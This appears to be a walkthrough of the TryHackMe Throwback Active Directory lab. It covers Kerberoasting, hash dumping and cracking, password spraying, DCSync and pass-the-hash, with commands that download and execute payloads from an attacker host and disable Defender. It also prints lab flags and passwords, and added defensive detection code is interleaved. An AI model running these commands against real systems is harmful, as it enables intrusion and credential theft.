    PS C:\Users\BlaireJ> Invoke-Bloodhound -CollectionMethod All -Domain Throwback -ZipFileName loot.zip                 
    ------------------------------------------------
    Initializing SharpHound at 3:26 PM on 12/29/2021
    ------------------------------------------------
    
    Resolved Collection Methods: Group, Sessions, LoggedOn, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
    
    [+] Cache File not Found: 0 Objects in cache
    
    [+] Pre-populating Domain Controller SIDS
    Status: 0 objects finished (+0) -- Using 84 MB RAM
    Status: 151 objects finished (+151 15.1)/s -- Using 97 MB RAM
    Enumeration finished in 00:00:10.5925838
    Compressing data to C:\Users\BlaireJ\20211229152617_loot.zip
    You can upload this file directly to the UI
    
    SharpHound Enumeration Completed at 3:28 PM on 12/29/2021! Happy Graphing!
    
    PS C:\Users\BlaireJ> dir
    
    
        Directory: C:\Users\BlaireJ
    
    
    Mode                 LastWriteTime         Length Name
    ----                 -------------         ------ ----
    d-r---         6/28/2020   3:31 PM                3D Objects
    d-r---         6/28/2020   3:31 PM                Contacts
    d-r---         8/25/2020   3:43 PM                Desktop
    d-r---         6/28/2020   3:31 PM                Documents
    d-r---         7/27/2020   8:39 AM                Downloads
    d-r---         6/28/2020   3:31 PM                Favorites
    d-r---         6/28/2020   3:31 PM                Links
    d-r---         6/28/2020   3:31 PM                Music
    d-r---          8/9/2020  10:25 AM                OneDrive
    d-r---         6/28/2020   3:33 PM                Pictures
    d-r---         6/28/2020   3:31 PM                Saved Games
    d-r---         6/28/2020   3:33 PM                Searches
    d-r---         7/14/2020  11:47 AM                Videos
    -a----        12/29/2021   3:28 PM          15330 20211229152617_loot.zip
    
    kali@kali:/media/sf_2_MisPostsBlog/THM/Throwback$ sudo proxychains scp "blairej"@10.200.179.222:20211229152617_loot.zip .
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.222:22  ...  OK
    blairej@10.200.179.222's password: 
    20211229152617_loot.zip 
    

    What service account is kerberoastable?

    In BloodHound, run the built-in query "List all Kerberoastable Accounts".

    SQLSERVICE

    What domain does the trust connect to?

    In BloodHound, run the built-in query "Map Domain Trusts".

    corporate.local

    What normal user account is a domain admin?

    In BloodHound, run the built-in query "Find all Domain Admins".

    Mercerh

    Task 24 - With three heads you'd think they'd at least agree once

    ┌──(root@kali)-[/media/sf_2_MisPostsBlog/THM/Throwback]
    └─# proxychains GetUserSPNs.py -dc-ip 10.200.179.117 "THROWBACK.local/blairej:7eQgx6YzxgG3vC45t5k9" -request
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:389  ...  OK
    ServicePrincipalName                         Name        MemberOf  PasswordLastSet             LastLogon                   Delegation 
    -------------------------------------------  ----------  --------  --------------------------  --------------------------  ----------
    TB-ADMIN-DC/SQLService.THROWBACK.local:6792  SQLService            2020-07-27 11:20:08.552650  2020-07-27 11:26:43.628665             
    
    
    
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:88  ...  OK
    $krb5tgs$23$*SQLService$THROWBACK.LOCAL$THROWBACK.local/SQLService*$ebd1055f628adf4dda15bbc00ae27ea7$[...]

    Cracking the ticket hash with hashcat (mode 13100, Kerberos 5 TGS-REP etype 23):

    kali@kali:~/Documents/THM/Throwback$ hashcat -m 13100 -a 0 sqlservice_ticket.txt /usr/share/wordlists/rockyou.txt 
    [...]:mysql337570

    What account was compromised by kerberoasting?

    SQLService

    What password was cracked from the retrieved ticket?

    mysql337570

    Task 25 - You're Five Minutes Late...

    echo "10.200.179.176 timekeep.throwback.local" | sudo tee -a /etc/hosts

    What is the hostname of the device?

    THROWBACK-TIME

    What is the title of the web page?

    Throwback Hacks Timekeep

    What user was the password reset for?

    murphyf

    What is the password reset flag on THROWBACK-TIME?

    kali@kali:~/Documents/THM/Throwback$ sudo proxychains curl "http://timekeep.throwback.local/dev/passwordreset.php?user=murphyf&password=PASSWORD"
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.176:80  ...  OK
    Password successfully updated TBH{326e71e82d2cfc439ee513340b8d9222}

    Task 26 - Word to your Mother

    What web server accepts XLSMs as a file upload?

    THROWBACK-TIME

    What page is the file upload in?

    timesheet.php

    What is the name of the XLSMs that you can upload?

    Timesheet.xlsm

    Task 27 - Meterpreter session 1 closed. Reason: World-Domination

    meterpreter > hashdump
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:43d73c6a52e8626eabc5eb77148dca0b:::
    DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    sshd:1008:aad3b435b51404eeaad3b435b51404ee:6eea75cd2cc4ddf2967d5ee05792f9fb:::
    Timekeeper:1009:aad3b435b51404eeaad3b435b51404ee:901682b1433fdf0b04ef42b13e343486:::
    WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
    
    kali@kali:~/Documents/THM/Throwback$ cat timekeeper_hash.txt 
    901682b1433fdf0b04ef42b13e343486
    kali@kali:~/Documents/THM/Throwback$ hashcat -m 1000 -a 0 timekeeper_hash.txt  /usr/share/wordlists/rockyou.txt 
    901682b1433fdf0b04ef42b13e343486:keeperoftime  
    

    Which user's hashes were we able to dump?

    Timekeeper

    What is the user's hash starting from the third colon?

    901682b1433fdf0b04ef42b13e343486

    What is the administrator's hash starting from the third colon?

    43d73c6a52e8626eabc5eb77148dca0b

    What is the user's cracked password?

    keeperoftime
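An added example (my own, not the post's) covering the NT hashes seen in Task 14 (john --format=NT on the pfSense hash) and here: an NT hash is MD4 over the UTF-16LE password with no salt and no iterations, so a defender can check a dump against a list of known-weak passwords directly instead of cracking. MD4 is implemented inline because hashlib often lacks it on OpenSSL 3 builds; the dump text is constructed from the hashdump output above and the candidate list is an assumption.

```python
import struct

def _lrot(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(message):
    """RFC 1320 MD4, written out because hashlib on OpenSSL 3 builds usually has no md4."""
    bit_len = (len(message) * 8) & 0xFFFFFFFFFFFFFFFF
    message += b"\x80"
    message += b"\x00" * ((56 - len(message) % 64) % 64)
    message += struct.pack("<Q", bit_len)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(message), 64):
        x = struct.unpack("<16I", message[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):   # round 1
            a, b, c, d = d, _lrot(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):   # round 2
            a, b, c, d = d, _lrot(a + g(b, c, d) + x[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):   # round 3
            a, b, c, d = d, _lrot(a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = ((a0 + a) & 0xFFFFFFFF, (b0 + b) & 0xFFFFFFFF,
                          (c0 + c) & 0xFFFFFFFF, (d0 + d) & 0xFFFFFFFF)
    return struct.pack("<4I", a0, b0, c0, d0)

def nt_hash(password):
    """NT hash = MD4 over the UTF-16LE password: unsalted, so equal passwords give equal hashes."""
    return md4(password.encode("utf-16-le")).hex()

EMPTY_NT = nt_hash("")   # 31d6cfe0d16ae931b73c59d7e0c089c0, the value Guest and DefaultAccount show above

def parse_pwdump_line(line):
    """user:rid:lmhash:nthash::: as printed by hashdump / secretsdump."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return {"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()}

def audit(dump_text, known_weak):
    """Per account: blank password, or which known-weak password the stored NT hash equals."""
    lookup = {nt_hash(p): p for p in known_weak}
    report = {}
    for line in dump_text.splitlines():
        if not line.strip():
            continue
        acct = parse_pwdump_line(line)
        if acct["nt"] == EMPTY_NT:
            report[acct["user"]] = "blank password"
        elif acct["nt"] in lookup:
            report[acct["user"]] = f"matches known-weak password {lookup[acct['nt']]!r}"
        else:
            report[acct["user"]] = "not in the candidate list"
    return report

# Constructed from the hashdump output above.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43d73c6a52e8626eabc5eb77148dca0b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd:1008:aad3b435b51404eeaad3b435b51404ee:6eea75cd2cc4ddf2967d5ee05792f9fb:::
Timekeeper:1009:aad3b435b51404eeaad3b435b51404ee:901682b1433fdf0b04ef42b13e343486:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:58f8e0214224aebc2c5f82fb7cb47ca1:::
"""
# Assumed candidate list: the page's weak-password file plus the two passwords it cracked.
KNOWN_WEAK = ["keeperoftime", "securitycenter", "Summer2020", "Password123", "Throwback2020"]

if __name__ == "__main__":
    for user, status in audit(SAMPLE_DUMP, KNOWN_WEAK).items():
        print(f"{user:20} {status}")
```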

    Task 28 - We gotta drop the load!

    kali@kali:~/Documents/THM/Throwback$ proxychains ssh Timekeeper@10.200.179.176
    Timekeeper@10.200.179.176's password: keeperoftime
    
    timekeeper@THROWBACK-TIME C:\xampp\mysql\bin>mysql.exe -u root -p
    Enter password: mysql337570 
    MariaDB [(none)]> show databases; 
    +--------------------+ 
    | Database           |
    +--------------------+
    | domain_users       |
    | information_schema |
    | mysql              |
    | performance_schema |
    | pets               |
    | phpmyadmin         |
    | test               |
    | timekeepusers      |
    +--------------------+
    MariaDB [(none)]> use domain_users; show tables; 
    Database changed        
    +------------------------+
    | Tables_in_domain_users |
    +------------------------+
    | users                  |
    +------------------------+
    1 row in set (0.000 sec)
    MariaDB [domain_users]> select * from users; 
    +----------------------+  
    | name                 |
    +----------------------+
    | ClemonsD             |
    | DunlopM              |
    | LoganF               | 
    | IbarraA              |               
    | YatesZ               |                                                       
    | CopelandS            |
    | MckeeE               |  
    | HeatonC              |  
    | FlowersK             |  
    | HardinA              |  
    | BurrowsA             |  
    | FinneganI            |
    | GalindoI             |               
    | LyonsC               |                                                       
    | FullerS              |                                                         
    | SteeleJ              |       
    | WangG                |                                                       
    | LoweryR              |                                                       
    | JeffersD             |                                                       
    | GreigH               |                                                       
    | SharpK               |                                                       
    | KruegerM             |                                                       
    | ChenI                |
    | VillanuevaD          |               
    | BegumK               |                                                       
    | TBH{ac3f61048236fd39 |                                                             
    | 8da9e2289622157e}    |        
    +----------------------+
    

    What database are the timekeep login users located in?

    timekeepusers

    What database are the domain users located in?

    domain_users

    What table was located in the domain users database?

    users

    What is the first username in the table?

    ClemonsD

    What is the root flag on THROWBACK-TIME?

    Using the meterpreter session we used for dumping the hashes:

    meterpreter > cat C:\\Users\\Administrator\\Desktop\\root.txt
    TBH{2898c692926188884bf508efe560588f}

    What is the SQL flag on THROWBACK-TIME?

    TBH{ac3f61048236fd398da9e2289622157e}

    Task 29 - So we're doing this again...

    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null crackmapexec smb 10.200.179.117 --continue-on-success -u users_db.txt -p weakPasswords.txt | grep \+
    SMB         10.200.179.117  445    THROWBACK-DC01   [+] THROWBACK.local\JeffersD:Throwback2020 
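    As an added detection example (not part of the original writeup): the spray above leaves one source address failing logons against many distinct accounts within a short window. This Python groups constructed 4625-style records by source and flags that pattern; the hosts, users and timestamps in the sample are constructed for the example.

```python
"""Password-spray detection over Windows logon-failure events (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events shaped like Security events 4625/4771:
# (timestamp, source IP, target user, event ID). 10.50.176.45 is the
# attacking host in this writeup; the benign source 10.200.179.50 is made up.
SPRAY_USERS = ["IbarraA", "YatesZ", "CopelandS", "MckeeE", "HeatonC", "JeffersD"]
SAMPLE_EVENTS = [
    (f"2020-08-10T09:00:{i:02d}", "10.50.176.45", u, 4625)
    for i, u in enumerate(SPRAY_USERS)
]
SAMPLE_EVENTS.append(("2020-08-10T09:00:07", "10.50.176.45", "JeffersD", 4624))  # the one success
SAMPLE_EVENTS += [("2020-08-10T09:05:00", "10.200.179.50", "ClemonsD", 4625)] * 3  # one user mistyping


def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Return {source_ip: [users]} for sources whose failed logons hit at least
    `min_users` distinct accounts inside any `window`-long span.

    A single user failing repeatedly never triggers; one source touching many
    accounts once each (staying under the lockout threshold) is the spray signature."""
    failures = defaultdict(list)
    for ts, src, user, event_id in events:
        if event_id in (4625, 4771):  # NTLM logon failure / Kerberos pre-auth failure
            failures[src].append((datetime.fromisoformat(ts), user))

    hits = {}
    for src, rows in failures.items():
        rows.sort()
        best, start = set(), 0
        for end in range(len(rows)):
            # slide the window start forward until rows[start:end+1] fits in `window`
            while rows[end][0] - rows[start][0] > window:
                start += 1
            users = {u for _, u in rows[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) >= min_users:
            hits[src] = sorted(best)
    return hits


if __name__ == "__main__":
    for src, users in detect_spray(SAMPLE_EVENTS).items():
        print(f"possible spray from {src}: {len(users)} accounts {users}")
```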

    What user was successfully password sprayed?

    JeffersD

    What was the password for the user?

    Throwback2020

    Task 30 - SYNCHRONIZE

    BloodHound shows that the backup account has DCSync rights, and its password is sitting in JeffersD's Documents folder:
    kali@kali:~/Documents/THM/Throwback$ proxychains ssh JeffersD@10.200.179.117
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:22  ...  OK
    JeffersD@10.200.179.117's password:   Throwback2020
    throwback\jeffersd@THROWBACK-DC01 C:\Users\jeffersd>type Documents\backup_notice.txt
    As we backup the servers all staff are to use the backup account for replicating the servers
    Don't use your domain admin accounts on the backup servers.
    
    The credentials for the backup are:
    TBH_Backup2348!
    
    Best Regards,
    Hans Mercer
    Throwback Hacks Security System Administrator
    
    
    kali@kali:~/Documents/THM/Throwback$ proxychains secretsdump.py -dc-ip 10.200.179.117 'THROWBACK/backup:TBH_Backup2348!'@10.200.179.117
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation
    
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:135  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:49667  ...  OK
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:4bedd990ee9b5b4ecc9ec1416f62401d:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:9e46b15fc5fb941c6ff32a752a6668d1:::
    [...]
    THROWBACK.local\MercerH:1206:aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea:::
    [...]
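    As an added detection example (not part of the original writeup): a DCSync like the one above is a directory replication request made by a plain user account, which a domain controller records as Security event 4662 carrying the replication control-access GUIDs. This Python flags such records when the subject is not a machine account; the sample records are constructed, and the GUIDs are the well-known replication right identifiers.

```python
"""Spot DCSync-style replication requests in Security event 4662 records (added example)."""
import re

# Well-known control-access right GUIDs for directory replication.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample 4662 records: (SubjectUserName, ObjectType, Properties).
# 'backup' mirrors the account abused above; the DC entry is normal DC-to-DC replication.
SAMPLE_4662 = [
    ("backup", "domainDNS",
     "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    ("THROWBACK-DC01$", "domainDNS", "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    ("ClemonsD", "user", "{bf967aba-0de6-11d0-a285-00aa003049e2}"),  # unrelated object access
]


def replication_rights(properties):
    """Return the replication right names present in a 4662 Properties field."""
    found = [REPLICATION_RIGHTS.get(g.lower()) for g in GUID_RE.findall(properties)]
    return sorted(r for r in found if r)


def dcsync_alerts(events, allowed_subjects=()):
    """Return [(subject, rights)] for replication requests that came neither from a
    machine account (DCs replicate as HOST$) nor from an allow-listed sync account."""
    alerts = []
    for subject, _obj_type, properties in events:
        rights = replication_rights(properties)
        if not rights or subject.endswith("$") or subject in allowed_subjects:
            continue
        alerts.append((subject, rights))
    return alerts


if __name__ == "__main__":
    for subject, rights in dcsync_alerts(SAMPLE_4662):
        print(f"replication request by non-DC account {subject}: {', '.join(rights)}")
```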

    What user has dcsync rights?

    backup

    What user can we dump credentials for and is an administrator?

    Mercerh

    Submit flags for THROWBACK-DC01 in Task 4.

    kali@kali:~/Documents/THM/Throwback$ proxychains psexec.py -hashes "aad3b435b51404eeaad3b435b51404ee:5edc955e8167199d1b7d0e656da0ceea" "THROWBACK.local/MercerH"@10.200.179.117
    [proxychains] config file found: /etc/proxychains4.conf
    [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
    [proxychains] DLL init: proxychains-ng 4.14
    Impacket v0.9.24.dev1+20210720.100427.cd4fe47c - Copyright 2021 SecureAuth Corporation

    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    [*] Requesting shares on 10.200.179.117.....
    [*] Found writable share ADMIN$
    [*] Uploading file aqRjwPOM.exe
    [*] Opening SVCManager on 10.200.179.117.....
    [*] Creating service Mrdy on 10.200.179.117.....
    [*] Starting service Mrdy.....
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    [!] Press help for extra shell commands
    [proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.200.179.117:445  ...  OK
    Microsoft Windows [Version 10.0.17763.1282]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>cd C:\users

    What is the user flag on THROWBACK-DC01?

    C:\Users>type C:\Users\gongoh\Desktop\user.txt
    TBH{e6119f456f5107d655be3682559f720f}

    What is the root flag on THROWBACK-DC01?

    C:\Users>type C:\Users\MercerH\Desktop\root.txt    
    TBH{1b9b614a505017c6fa34cb188581db65}

    What is the account description flag on THROWBACK-DC01?

    C:\Users>powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://10.50.176.45/PowerView.ps1'); Get-NetUser | select samaccountname, description" 
    [...]
    samaccountname description                                              
    -------------- -----------
    MercerH        TBH{b89d9a1648b62a7f2ed01038ac47796b}

    Task 31 - This forest has trust issues

    hashcat -m 1000 -a 0 -r rules/OneRuleToRuleThemAll.rule hashes/mercerh_hash.txt /usr/share/wordlists/rockyou.txt
    5edc955e8167199d1b7d0e656da0ceea:pikapikachu7
    
    kali@kali:~/Documents/THM/Throwback$ proxychains scp /tmp/NotAShell.exe Mercerh@10.200.179.117:"C:/Windows/Temp/"
    kali@kali:~/Documents/THM/Throwback$ proxychains ssh Mercerh@10.200.179.117 "C:/Windows/Temp/NotAShell.exe"
    
    use multi/manage/autoroute
    set session 15
    set subnet 10.200.179.0
    exploit
    use auxiliary/server/socks_proxy
    exploit
    

    What domain has a trust relationship with THROWBACK.local?

    corporate.local

    What is the hostname of the machine that has a forest trust with the domain controller?

    CORP-DC01

    What is the Administrator account we can use to access the second forest?

    mercerh

    What is the name of the file in the Administrator's Documents folder?

    server_update.txt

    Submit flags for CORP-DC01 in Task 4

    Run a cmd as administrator:

    What is the user flag on CORP-DC01?

    C:\Windows\System32>type C:\Users\Mercerh\Desktop\user.txt
    TBH{773e16d57284363e68a4db254860aed1}

    What is the root flag on CORP-DC01?

    C:\Windows\System32>type C:\Users\Administrator\Desktop\user.txt
    TBH{d2368a76214103ac670a7984b4dba5a3}

    Task 32 - r/badcode would like a word

    GitHub repository: Link

    What User has a Github Account?

    Rikka Foxx

    What was the user found in github?

    DaviesJ

    What password was found in github?

    Management2018

    What machine can you access with the credentials?

    kali@kali:~/Documents/THM/Throwback$ sudo proxychains xfreerdp /u:MercerH /p:'pikapikachu7' /v:10.200.179.118  
    
    # Run a cmd as administrator
    C:\Users\MercerH\Documents> powershell.exe -exec bypass -c "Set-MpPreference -DisableRealtimeMonitoring 1"
    C:\Users\MercerH\Documents>certutil -urlcache -f http://10.50.176.45/NotAShell.exe NotAShell.exe
    C:\Users\MercerH\Documents> .\NotAShell.exe
    
    use multi/manage/autoroute
    set session 21
    set subnet 10.200.179.0
    exploit
    use auxiliary/server/socks_proxy
    exploit
    
    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null evil-winrm  -u DaviesJ -p Management2018 -i 10.200.179.243
    *Evil-WinRM* PS C:\Users\daviesj\Documents> 

    CORP-ADT01

    What is the flag on GitHub?

    https://github.com/RikkaFoxx

    TBH{19fa56ead6f82d8c4abc664e2e56f0b1}

    What is the flag on Twitter?

    https://twitter.com/tbhSecurity/status/1292594165855981568

    TBH{ca57861454b195f6a5c951a634e05f9e}

    Task 33 - Identity Theft is not a Joke Jim

    *Evil-WinRM* PS C:\Users\daviesj\Documents> certutil -urlcache -f http://10.50.176.45/NotAShell.exe NotAShell.exe
    ****  Online  ****
    CertUtil: -URLCache command completed successfully.
    *Evil-WinRM* PS C:\Users\daviesj\Documents> .\NotAShell.exe
    
    meterpreter > use incognito
    Loading extension incognito...Success.
    meterpreter > list_tokens -u
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
                 Call rev2self if primary process token is SYSTEM
    
    Delegation Tokens Available
    ========================================
    CORPORATE\DaviesJ
    Font Driver Host\UMFD-0
    Font Driver Host\UMFD-1
    Font Driver Host\UMFD-2
    NT AUTHORITY\LOCAL SERVICE
    NT AUTHORITY\NETWORK SERVICE
    NT AUTHORITY\SYSTEM
    Window Manager\DWM-1
    Window Manager\DWM-2
    
    Impersonation Tokens Available
    ========================================
    CORPORATE\DosierK
    
    meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
    [-] Warning: Not currently running as SYSTEM, not all tokens will be available
                 Call rev2self if primary process token is SYSTEM
    [+] Delegation token available
    [+] Successfully impersonated user NT AUTHORITY\SYSTEM
    
    meterpreter > cat C:\\USers\\dosierk\\Documents\\email_update.txt
    Hey team! Hope you guys are having a good day!
    
    As all of you probably already now we are transferring to our new email service as we
    transition please use the new emails provided to you as well as the default credentials
    that can be found within your emails.
    
    Please do not use these emails outside of corporate as they contain sensitive information.
    
    The new email format is based on what department you are in:
    
    ESM-Example@TBHSecurity.com
    FIN-Example@TBHSecurity.com
    HRE-Example@TBHSecurity.com
    ITS-Example@TBHSecurity.com
    SEC-Example@TBHSecurity.com
    
    In order to access your email you will need to go to mail.corporate.local as we get our 
    servers moved over.
    
    If you do not already have mail.corporate.local set in your hosts file please reach out to
    IT to get that fixed.
    
    Please remain patient as we make this transition and please feel free to email me with any
    questions you may have regarding the new transition: HRE-KDoiser@TBHSecurity.com
    
    Karen Dosier,
    Human Relations Consulatant
    

    What file is on the Administrator's Documents folder?

    email_update.txt

    Who wrote the email?

    Karen Dosier

    What is her official title in the company?

    Human Relations Consulatant

    Submit flags for CORP-ADT01 in Task 4

    What is the user flag on CORP-ADT01?

    meterpreter > cat C:\\USers\\DaviesJ\\Desktop\\user.txt
    TBH{250fd11eadbd01e7ed14196611d7b255}

    What is the root flag on CORP-ADT01?

    meterpreter > cat C:\\USers\\dosierk\\Desktop\\root.txt
    TBH{7defa0d5b36c72a48e5966fd2493e19e}

    What is the flag on LinkedIn?

    Link -> TBH{2913c22315f3ce3c873a14e4862dd717}

    Task 35 - Lost and Found

    You need to configure FoxyProxy in the browser to use the SOCKS proxy that proxychains points at in order to reach the web sites.

    echo "10.200.179.232 mail.corporate.local www.breachgtfo.local" | sudo tee -a /etc/hosts
    
    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null ffuf -w new_emails.txt -u http://www.breachgtfo.local/search.php?search=FUZZ -fw 1265
    test@email.com          [Status: 200, Size: 5046, Words: 1284, Lines: 224]
    SEC-jstewart@TBHSecurity.com [Status: 200, Size: 5071, Words: 1284, Lines: 224]
    
    Email: SEC-JStewart@TBHSecurity.com
    Password: aqAwM53cW8AgRbfr
    Username: JStewart
    Data Breach: pwnDB
    

    What is the Users email who has been affected by the Databreach?

    SEC-JStewart@TBHSecurity.com

    What was the Users password?

    aqAwM53cW8AgRbfr

    What credentials could be found in the Email?

    TBSEC_GUEST:WelcomeTBSEC1!

    Submit flags for reconnaissance in Task 4

    What is the flag in the source code of Breach || GTFO?

    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null curl "http://www.breachgtfo.local/search.php?search=SEC-jstewart@TBHSecurity.com" | grep TBH
    <!--TBH{53f3a6cb77f633edd9749926b9a9217b}-->

    TBH{53f3a6cb77f633edd9749926b9a9217b}

    What is the flag on the Corporate Mail server?

    Logging in at http://mail.corporate.local/mailbox.php with that email address and password gives the flag.

    TBH{19b6ca4281bbef3ee060aaf1c2eb4021}

    Task 36 - Kerberoasting II Electric Boogaloo

    kali@kali:~/Documents/THM/Throwback$ proxychains 2>/dev/null xfreerdp  /u:TBSEC_GUEST /p:'WelcomeTBSEC1!' /v:10.200.179.79
    
    
    C:\Users\TBSEC_GUEST>powershell -exec bypass "IEX(New-Object Net.WebClient).downloadString('http://10.50.176.45/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat Hashcat"
    
    
    TicketByteHexStream  :
    Hash                 : $krb5tgs$23$*TBService$TBSECURITY.local$TBSEC-DC01/TBService.TBSECURITY.local[...]
    SamAccountName       : TBService
    DistinguishedName    : CN=TBService,OU=Quarantine,DC=TBSECURITY,DC=local
    ServicePrincipalName : TBSEC-DC01/TBService.TBSECURITY.local:48064
    
    kali@kali:~/Documents/THM/Throwback$ hashcat -m 13100 tbservice_ticket.txt /usr/share/wordlists/rockyou.txt 
    [...]:securityadmin284650
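    As an added detection example (not part of the original writeup): the `$krb5tgs$23$` prefix above means the service ticket was issued with RC4-HMAC (etype 23, 0x17), which a domain controller logs in Security event 4769 as TicketEncryptionType 0x17. This Python flags RC4 service-ticket requests for non-machine service accounts and groups them by requester; the records are constructed, and the second service name SQLSvc is made up.

```python
"""Flag likely Kerberoasting in Security event 4769 records (added example)."""
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23, the '$krb5tgs$23$' hash format cracked above

# Constructed sample 4769 records:
# (TargetUserName, ServiceName, TicketEncryptionType, Status)
SAMPLE_4769 = [
    ("TBSEC_GUEST@TBSECURITY.LOCAL", "TBService", 0x17, "0x0"),   # the roasted account
    ("TBSEC_GUEST@TBSECURITY.LOCAL", "krbtgt", 0x12, "0x0"),      # TGT renewal, AES
    ("TBSEC_GUEST@TBSECURITY.LOCAL", "TBSEC-DC01$", 0x12, "0x0"), # machine account, AES
    ("daviesj@TBSECURITY.LOCAL", "TBService", 0x12, "0x0"),       # legit AES ticket
    ("TBSEC_GUEST@TBSECURITY.LOCAL", "SQLSvc", 0x17, "0x0"),      # made-up second SPN
    ("TBSEC_GUEST@TBSECURITY.LOCAL", "SQLSvc", 0x17, "0x1b"),     # failed request, ignored
]


def is_roastable_request(service, etype, status):
    """True for a successful RC4 service ticket to a user-type service account.
    Machine accounts (HOST$) and krbtgt are excluded; AES-only service accounts
    never produce etype 0x17, which is why hardening them defeats this path."""
    return (status == "0x0" and etype == RC4_HMAC
            and not service.endswith("$") and service.lower() != "krbtgt")


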